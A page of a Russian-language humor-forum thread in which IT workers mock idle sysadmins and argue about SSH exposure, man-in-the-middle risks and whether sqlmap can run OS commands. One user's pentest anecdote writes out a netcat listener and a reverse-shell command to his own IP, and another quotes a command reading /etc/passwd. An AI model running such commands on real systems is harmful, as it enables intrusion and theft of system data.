Кого же мы вырастили в IT - втыкателей кабелей с "танчиками", или великая сказка про русских айтишников ...

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (16) « Первая ... 7 8 [9] 10 11 ... Последняя »  К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
snegopek
21.03.2017 - 23:41
0
Статус: Offline

Приколист

Цитата (iobus @ 21.03.2017 - 22:48)
Цитата (snegopek @ 21.03.2017 - 22:41)
Дядя кого мы вырастили ????
То что ты тут прогнал полнейшая жесть. SSH не доступен с внешнего Ip , SSH на внешнем Ip иди умри, За такое увольняют.

Аж икнул. С домашнего IP (динамического) заходил по SSH на разные сервера, многократно, и захожу примерно раз в два-три дня :)

Проходи, мальчик :)

Икай дальше , из-за таких как ты люди бабло теряют, недоадмин. Об основах безопасности видать ты даже мельком не слышал.

[^]
7H21
21.03.2017 - 23:43
0

Si vis pacem, para bellum

Цитата
Вы лучше пожелайте удачи парням посередине

что они будут делать при наличии X.509 сертификатов?
Или собственных сертификатов вообще?

[^]
gebs
21.03.2017 - 23:45
0

Ярила

Цитата (iobus @ 21.03.2017 - 18:11)
Отдел IT, обслуживаем несколько крупных организаций. Самая большая - 7 этажей, до хрена компьютеров и юзеров. 5 сисадминов, у всех профильное образование в виде ВУЗа, всем или по 30, или слегка за, у всех семьи, дети, кредиты за машины, ипотеки, в общем все хотят зарабатывать (получать) как можно лучше. Получают на сеодняшний день вполне прилично.

Я уже немолодой дяденька, они мне все почти в дети годятся.

Сегодня утром звонок от одного из админов (начальник в отпуске, я как старший по званию после него, на больничном с бронхитом, но в доступе):
- Здравствуйте, ... у нас тут все корпоративные сайты перестали грузиться, ... или грузятся ... очень медленно .... Вы ничего там не делали? Тут уже начальство звонило ... (в трубке прослушивается звук игры "танчики", многоточия - это паузы, знаю, что у него стоит второй монитор, на котором круглый день играются "танчики", видимо игра отвлекает :))

Сервер свой, стоит в конторе, ничего особенного, Linux + Apache, + все что нужно, обычно работает бесперебойно, крутится сайтов около 20. Тут же пытаюсь соединиться удаленно - отказ в доступе на IP по FTP и SSH.

- Гляньте, пожалуйста, проблема кажется с вашей стороны, Вы там железо не трогали? Попробуйте сконнектиться.
- Нет, мы ... ничего не трогали (слышен звук стрельбы из танка) ... щаз ... нет, я по внутренней сети тоже сервера не вижу ...
- Попробуйте еще
- Ну вот ... я Сашу попросил ... у него тоже сервер не виден ... (Саша сидит за соседним столом, тоже весь в танчиках).

(Спуститься на этаж вниз в серверную и посмотреть, что там на сервере напрямую, видимо, не судьба, что-то не позволяет ... или не отпускает).

Вижу, что ничего хорошего не предвидится. Заползаю на сервер своими методами - вижу, что все в целом на месте (кроме пары новых вирусов :)) . Поднимаю такого же, как я , немолодого дяденьку, который у нас админ, но работает удаленно и вообще как-то на то ли пол, то ли треть ставки. Он залезает удаленно на сервер своими методами, через 5 минут сообщает - сошел с ума антиспам на почтовике, валит тонны спама и запускает какие-то процессы, в результате забито все свободное место и перегруз процессора. За почтовик с антиспамом, кстати, отвечают именно наши админы.

Минут через 30 проблема решена, антиспам поставлен в стойло, все веб сайты грузятся, почта ходит. Проблема совсем не сложная, кстати, случается уже в третий раз.

Отзваниваю админам:

- Все в порядке, все арбайтен
- А, хорошо ... (прослушиватеся звук "танчиков")
- Вы отзвонитесь, если опять что-то будет
- Да ... позвоним ... (прослушиватеся звук "танчиков")

Ну как то вызывает всякие не самые лучшие мысли. Работа сведена в втыканию проводов, если нужно, подключить кому-то принтер, вершина - это заменить жесткий диск в компутере какого-нибудь юзера и поставить Виндоуз- Офис. Все остальное - ну видимо, а ну его нах, "танчики", "танчики", "танчики" ... ну и во что-то там еще они играют, причем "командой".

Но на недостаточную зарплату и упоминание ипотек, кредитов и т.д намекают регулярно.

Что же будет дальше?

После слов "ничего особенного, Linux + Apache, + все" мне стало грустно за вашу контору)

[^]
bimb0
21.03.2017 - 23:47
1

МимоКрокодил (c)

Цитата (kazanec @ 21.03.2017 - 23:35)
Возражу. Из своей практики проведения пентеста:
Сайт на PHP + PostgreSQL.
тестил все точки входа - тишина. Не нашел даже XSS.
И только в одном месте Time Based SQL injection, причем до такой степени противный time based - оооочень медленный.
SQLmap с опцией --os-cmd выполнил тестовую команду id
далее было всё намного проще:
на своей машине nc -lvp 3333
на удаленной через sqlmap: nc -nv <мой_IP> 3333
и я имею реверс шелл с удаленного сервера. Далее можно было пробовать локальные эксплойты под ядро, чтобы до root-а подняться, но этого не требовалось.
Кстати хозяин оплатил очень хорошо :)

А вот и не соглашусь, выполнять команды скульмап может только через xp_cmdshell (mssql), в nix - так.

[^]
kazanec
21.03.2017 - 23:48
0

Ярила

Цитата (bimb0 @ 21.03.2017 - 23:47)
Цитата (kazanec @ 21.03.2017 - 23:35)
Возражу. Из своей практики проведения пентеста:
Сайт на PHP + PostgreSQL.
тестил все точки входа - тишина. Не нашел даже XSS.
И только в одном месте Time Based SQL injection, причем до такой степени противный time based - оооочень медленный.
SQLmap с опцией --os-cmd выполнил тестовую команду id
далее было всё намного проще:
на своей машине nc -lvp 3333
на удаленной через sqlmap: nc -nv <мой_IP> 3333
и я имею реверс шелл с удаленного сервера. Далее можно было пробовать локальные эксплойты под ядро, чтобы до root-а подняться, но этого не требовалось.
Кстати хозяин оплатил очень хорошо :)

А вот и не соглашусь, выполнять команды скульмап может только через xp_cmdshell (mssql), в nix - так.

а я про что?
Цитата
--os-cmd=OSCMD Execute an operating system command

Это сообщение отредактировал kazanec - 21.03.2017 - 23:48

[^]
7H21
21.03.2017 - 23:49
4

Цитата
После слов "ничего особенного, Linux + Apache, + все" мне стало грустно за вашу контору)

Сказал человек, который только-что сам допустил один из самых ламерских косяков - квоттинг целого поста и ответ в одну строчку.

Что кстати не так с апачем?
Ну вот, для рядовых целей?

[^]
bimb0
21.03.2017 - 23:49
0

МимоКрокодил (c)

Цитата (kazanec @ 21.03.2017 - 23:48)
а я про что?
Цитата

Прочтите каким методом выполняются системные команды скульмапом dont.gif
Цитата (7H21 @ 21.03.2017 - 23:43)
что они будут делать при наличии X.509 сертификатов?
Или собственных сертификатов вообще?

А ничего скорее всего, хотя, если очень заморочиться - можно подменить любой качаемый вами exe на RAT/HVNC и делать все, что угодно cool.gif

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:51

[^]
andysh888
21.03.2017 - 23:50
0

Ярила

Цитата (bimb0 @ 21.03.2017 - 23:35)
Вы лучше пожелайте удачи парням посередине gigi.gif
Что такое mitm вы можете прочитать в википедии, а как подменяются DNS и что из этого выходит вам лучше и не знать.
З.Ы. Если есть возможность - я полюзую ключи, а если есть возможность использовать еще и двухфакторку - я обязательно ей воспользуюсь cool.gif

Я старый олдфаг. :)
Потому у меня все коннекты строго по IP (и срал я на DNS, да и IP все свои я помню на память) и SSH зажат строго в V2 (и на клиенте тоже не забываю ставить).

Понимаю, что это не панацея, но шансы на нормальную атаку тем же mitm - имхо, даже меньше, чем мне 6 из 45 выиграть, купив один билет за всю жизнь :). Потому как надо до икса для вклинивания в роутинг, да ещё и сеанс на открытии надо поймать. Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).

[^]
kazanec
21.03.2017 - 23:52
0

Ярила

Цитата (bimb0 @ 21.03.2017 - 23:49)
Цитата (kazanec @ 21.03.2017 - 23:48)
а я про что?
Цитата

Прочтите каким методом выполняются системные команды скульмапом dont.gif

мне не нужно читать маны sqlmap-а - это один из моих основных инструментов
Работает так, как я описал.
P.S.: Само собой на стороне сервера не винда была.

[^]
vkaraban
0

Шутник

если меня начинают затрахивать с мелкими просьбами и говорят что ты все равно на компьютере играешь - говорю идите "далеко" - не моя работа
я свою сделал

начинают пресовать или угрожать - сваливаю в течение года при условии помогать на предыдущей работе за тройную оплату

вы не поверите - тихо мирно - никто не донимает - играю себе на компе - 500 серверов и херова туча молчаливых и согласных со всем пользователей

идилия - главное тех кто мешает на компе играть послать подальше и поглубже

[^]
bimb0
0

МимоКрокодил (c)

Цитата (andysh888 @ 21.03.2017 - 23:50)
Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).

Вы правда думаете, что все делается ручками? cool.gif

[^]
bimb0
21.03.2017 - 23:53
0

МимоКрокодил (c)

Цитата (kazanec @ 21.03.2017 - 23:52)

Ну вы все-таки прочитайте и сюда скиньте как скульмап выполняет команды...

[^]
kazanec
21.03.2017 - 23:54
0

Ярила

Цитата (bimb0 @ 21.03.2017 - 23:53)
Цитата (kazanec @ 21.03.2017 - 23:52)

Ну вы все-таки прочитайте и сюда скиньте как скульмап выполняет команды...

Из вашего же примера:
Цитата
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

[^]
NMNH
21.03.2017 - 23:54
0

Ярила

Закончится все это как всегда - наступит кризис и всех этих "танкистов" выкинут нахер на мороз как лишнее звено и, чсх, даже не заметят разницы.
А они в свою очередь придут на ЯП и будут ныть "как все в стране херово, даже вот таких великих специалистов (тут не будет уточняться в чем) сократили и оставили без хлеба и ипотеки. Страна катится в г-но, все ужасно, везде распилы и безблагодатность" - в общем будет очередная порция говноедских постов, чтобы оправдать собственную уебищность и не признать собственных ошибок.

Упс, смотрю тут уже перешли в прикладную айти фаллометрию, а я все первый пост комментирую. Пардон, не буду мешать. )

Это сообщение отредактировал NMNH - 22.03.2017 - 00:02

[^]
andysh888
21.03.2017 - 23:55
0

Ярила

Цитата (bimb0 @ 21.03.2017 - 23:52)
Цитата (andysh888 @ 21.03.2017 - 23:50)
Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).

Вы правда думаете, что все делается ручками? cool.gif

Я знаю сколько стоят ботнеты :)

[^]
bimb0
21.03.2017 - 23:56
0

МимоКрокодил (c)

Цитата (kazanec @ 21.03.2017 - 23:54)
Из вашего же примера:
Цитата
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.

Ну а я про что? gigi.gif
Заливается файл с расширением пхп и минишеллом внутри, нельзя системные команды в никсах через sql-inj выполнять, можно только записать произвольные данные в файл (если file_priv=y, нет кавычек и дира позволяет в себя писать+ доступна из веба).

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:57

[^]
xMSEx
21.03.2017 - 23:56
0

ln -s /dev/ass /dev/hands

Цитата (bimb0 @ 21.03.2017 - 22:41)
Цитата (xMSEx @ 21.03.2017 - 22:39)
Вполне себе можно добиться выполнения произвольных команд от юзера приложения, можно по бд пошариться. Есть разные варианты.

Нука пример? cool.gif
Никаких "произвольных команд", при sql-inj вы можете использовать только sql (и то сильно ограниченно) какой там exec, да тем более через тот же sеlесt dont.gif

как тебе вариант выполнения запроса, который отдает в ответе строку кода, который выполняется внутри приложения если нет четких критериев обработки ответа? и не надо мне говорить, что это не работает, это прекрасно работает. тот же селект, который вернет в ответе, для примера exec(/bin/cat /etc/passwd); который будет обработан php...

[^]
7H21
21.03.2017 - 23:58
0

Цитата
можно подменить любой качаемый вами exe на RAT/HVNC

ну мне сложно представить конкретно в моём случае такую ситуацию.
Разве-что как-то очень сложным путем репозиторий дебиана например подменить...

Да и активность на левых портах отслеживается постоянно.
Ну и процессы можно подписывать, если паранойя :))

[^]
bimb0
21.03.2017 - 23:59
0

МимоКрокодил (c)

Цитата (xMSEx @ 21.03.2017 - 23:56)
как тебе вариант выполнения запроса, который отдает в ответе строку кода, который выполняется внутри приложения если нет четких критериев обработки ответа? и не надо мне говорить, что это не работает, это прекрасно работает. тот же селект, который вернет в ответе, для примера exec(/bin/cat /etc/passwd); который будет обработан php...

Фантазер shum_lol.gif
Чтобы любой код из базы вполнился необходимо засунуть его в хотя бы в эвал, любо в коллбэк-функции.
и будет это уже не sql-inj, а php-inj/code exec из-за недостаточной фильтрации данных dont.gif

[^]
xMSEx
0

ln -s /dev/ass /dev/hands

Цитата (bimb0 @ 21.03.2017 - 22:50)
Цитата (iobus @ 21.03.2017 - 22:48)
Аж икнул. С домашнего IP (динамического) заходил по SSH на разные сервера, многократно, и захожу примерно раз в два-три дня :)

Проходи, мальчик :)

Ага, только не ты 1 это можешь сделать lol.gif
Хоть по серту, али логин+пасс? gigi.gif
Или про ssh-bruteforce не слышалис?

у меня с брутом отлично справляется fail2ban, как вариант

[^]
Карлсончег
0

Ярила

Лол. Если только такая мелкая хрень случилась, а всё остальное работает - это хороший показатель работы. В жопу компы. Как мы с програмером внедряли УПП + кучу новых серваков на разрозненных территориально предприятиях - это жопа. При этом куча других проблем вялотекущих. Короче, врагу не пожелаешь. А раньше был только ADSL. По удалёнке плохо было.

[^]
7H21
22.03.2017 - 00:00
0

Цитата
коннекты строго по IP (и срал я на DNS, да и IP все свои я помню на память) и SSH зажат строго в V2

Ну это вообще азы...

[^]
Craig
0

Ярила

Цитата (base64 @ 21.03.2017 - 21:10)
Цитата
Это просто праздник какой-то. А зачем у вас там nginx если все на апаче? cry.gif

З.Ы. Ты точно админ а не тупо выдумал котоламповую историю порубать чуток юкки на теме "молодежь нынче ну тупаааая!" gigi.gif

Ты погоди, щас окажется, что нжинкс просто стоит на гейтвее вместе с задроченным варнишем для кэширования, за ним фронт-энды на апачах, редисы-хуедисы, мэмкэши, и вместо БД галерный кластер. И все это стараниями нашего покорного слуги ТСа. rulez.gif

Хм. А фалькона у вас там нет случайно?

[^]
kazanec
0

Ярила

Цитата (bimb0 @ 21.03.2017 - 23:56)
Цитата (kazanec @ 21.03.2017 - 23:54)
Из вашего же примера:
Цитата

Ну а я про что? gigi.gif
Заливается файл с расширением пхп и минишеллом внутри, нельзя системные команды в никсах через sql-inj выполнять, можно только записать произвольные данные в файл (если file_priv=y, нет кавычек и дира доступна из веба).

Пиздец.
Теоретик спорит с практиком )))))))
Генерится пейлоад, далее он заливается (перед этим всем, если не включена опция batch будут вопросы по языку программирования на аткуемой стороне, платформе 32/64) -> _исполняется_заданная_команда_которая находится_в_пейлоаде_

Не надо глупости нести.

[^]
bimb0
22.03.2017 - 00:02
0

МимоКрокодил (c)

Цитата (kazanec @ 22.03.2017 - 00:00)
Пиздец.
Теоретик спорит с практиком )))))))
Генерится пейлоад, далее он заливается (перед этим всем, если не включена опция batch будут вопросы по языку программирования на аткуемой стороне, платформе 32/64) ->  _исполняется_заданная_команда_которая находится_в_пейлоаде_

Не надо глупости нести.

Слушай, практик, давай уже пример, скульмап запустить много мозга не надо, ты лучше расскажи как генерится пейлод, как полезная нагрузка попадает на атакуемую машину и как, а главное кем, интепретируется gigi.gif
Цитата (7H21 @ 21.03.2017 - 23:58)
ну мне сложно представить конкретно в моём случае такую ситуацию.
Разве-что как-то очень сложным путем репозиторий дебиана например подменить...

Да и активность на левых портах отслеживается постоянно.
Ну и процессы можно подписывать, если паранойя :))

А у вас репы айпишниками прописаны или доменами? cool.gif Если второе, то подмена DNS все решит brake.gif

Это сообщение отредактировал bimb0 - 22.03.2017 - 00:06

[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 75436
0 Пользователей:
Страницы: (16) « Первая ... 7 8 [9] 10 11 ... Последняя » [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]

Активные темы

Наверх